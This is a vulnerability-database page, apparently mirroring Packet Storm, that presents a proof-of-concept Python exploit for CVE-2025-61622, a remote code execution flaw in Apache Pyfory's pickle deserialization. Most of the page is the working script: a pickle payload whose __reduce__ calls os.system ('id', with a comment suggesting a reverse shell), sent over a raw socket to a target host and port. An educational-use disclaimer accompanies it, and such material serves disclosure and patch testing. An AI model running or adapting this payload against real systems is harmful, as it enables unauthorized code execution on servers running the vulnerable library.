Lucene search
+L

๐Ÿ“„ Apache Pyfory 0.12.2 Remote Code Execution

๐Ÿ—“๏ธย 03 Oct 2025ย 00:00:00Reported byย SK Rahimul HaqueTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstorm.news๐Ÿ‘ย 204ย Views

PoC for CVE-2025-61622 RCE in Apache Pyfory via insecure pickle deserialization.

Related
Code
#!/usr/bin/env python3
    """
    ===========================================================================
    CVE-2025-61622 Proof of Concept (PoC)
    Author: SK Rahimul Haque
    Contact: [email protected]/https://www.linkedin.com/in/sk-rahimul-haque-51538522a/
    Date: 2025-10-03
    ===========================================================================
    
    Description:
    This PoC demonstrates the Remote Code Execution (RCE) vulnerability in 
    Apache Pyfory (versions 0.12.0-0.12.2 and legacy PyFury 0.1.0-0.10.3) 
    due to insecure pickle fallback deserialization (CVE-2025-61622).
    
    Disclaimer:
    This code is for educational and authorized testing purposes only.
    Do not use for unauthorized activities. The author assumes no liability 
    for misuse or damage caused by this script.
    
    License: MIT License (Optional: Add if applicable)
    ===========================================================================
    """
    
    import pickle
    import socket
    import os
    import sys
    
    # --- Banner ---
    def print_banner():
        banner = """
    โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•—
    โ•‘                CVE-2025-61622 PoC Exploit                    โ•‘
    โ•‘                 Author: SK Rahimul Haque                     โ•‘
    โ•‘               Educational Use Only - Do Not Misuse           โ•‘
    โ•šโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•
        """
        print(banner)
    
    # --- Payload Class ---
    class RCEPayload:
        def __reduce__(self):
            # Reverse shell command (adjust IP/port as needed)
            cmd = "id"
            return (os.system, (cmd,))
    
    # --- Exploit Functions ---
    def create_exploit():
        """Generate malicious pickle payload."""
        print("[*] Creating malicious payload...")
        return pickle.dumps(RCEPayload())
    
    def exploit_target(target_host, target_port):
        """Send payload to vulnerable Pyfory application."""
        payload = create_exploit()
        
        try:
            print(f"[*] Connecting to {target_host}:{target_port}...")
            client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            client.connect((target_host, target_port))
            print("[+] Connection established.")
            
            print("[*] Sending payload...")
            client.send(payload)
            print("[+] Payload sent successfully!")
            
            client.close()
        except Exception as e:
            print(f"[-] Exploit failed: {e}")
    
    # --- Main Execution ---
    if __name__ == "__main__":
        print_banner()
        
        if len(sys.argv) != 3:
            print("Usage: python cve_2025_61622_poc.py <target_host> <target_port>")
            print("Example: python cve_2025_61622_poc.py 127.0.0.1 9000")
            sys.exit(1)
        
        target_host = sys.argv[1]
        target_port = int(sys.argv[2])
        
        exploit_target(target_host, target_port)

Data

Build on a solid foundation withย Vulners data

Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data

Api

Power your application withย Vulners API

The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access

App

Assess and manage vulnerabilities withย Vulnersย tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

03 Oct 2025 00:00Current
8.2High risk
Vulners AI Score8.2
CVSS 3.19.8
EPSS0.41255
SSVC
204